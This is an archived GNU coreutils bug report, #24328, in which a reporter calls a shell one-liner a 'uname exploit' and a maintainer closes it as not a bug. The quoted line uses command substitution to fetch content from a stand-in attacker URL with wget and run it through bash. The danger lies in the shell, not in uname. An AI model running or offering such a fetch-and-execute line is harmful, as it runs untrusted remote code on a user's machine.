GNU bug report logs - #24328
uname exploit

Previous Next

Package: coreutils;

Reported by: Shane <linuxshane <at> gmail.com>

Date: Mon, 29 Aug 2016 15:28:01 UTC

Severity: normal

Done: Paul Eggert <eggert <at> cs.ucla.edu>

Bug is archived. No further changes may be made.

Full log

View this message in rfc822 format

From: help-debbugs <at> gnu.org (GNU bug Tracking System)
To: Shane <linuxshane <at> gmail.com>
Subject: bug#24328: closed (Re: bug#24328: uname exploit)
Date: Mon, 29 Aug 2016 15:59:02 +0000

[Message part 1 (text/plain, inline)]
Your bug report

#24328: uname exploit

which was filed against the coreutils package, has been closed.

The explanation is attached below, along with your original report.
If you require more details, please reply to 24328 <at> debbugs.gnu.org.

-- 
24328: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=24328
GNU Bug Tracking System
Contact help-debbugs <at> gnu.org with problems

[Message part 2 (message/rfc822, inline)]
From: Paul Eggert <eggert <at> cs.ucla.edu>
To: Shane <linuxshane <at> gmail.com>, 24328-done <at> debbugs.gnu.org
Subject: Re: bug#24328: uname exploit
Date: Mon, 29 Aug 2016 08:58:40 -0700

Shane wrote:
> uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"

I don't see a bug here, so I'm marking this as done.


[Message part 3 (message/rfc822, inline)]
From: Shane <linuxshane <at> gmail.com>
To: bug-coreutils <at> gnu.org
Subject: uname exploit
Date: Mon, 29 Aug 2016 02:25:03 -0500

Hi, I am unsure if you have seen this, but I am concerned about this - 
can or should uname be restricted to root use only?

uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"
This bug report was last modified 8 years and 328 days ago.

Previous Next

GNU bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.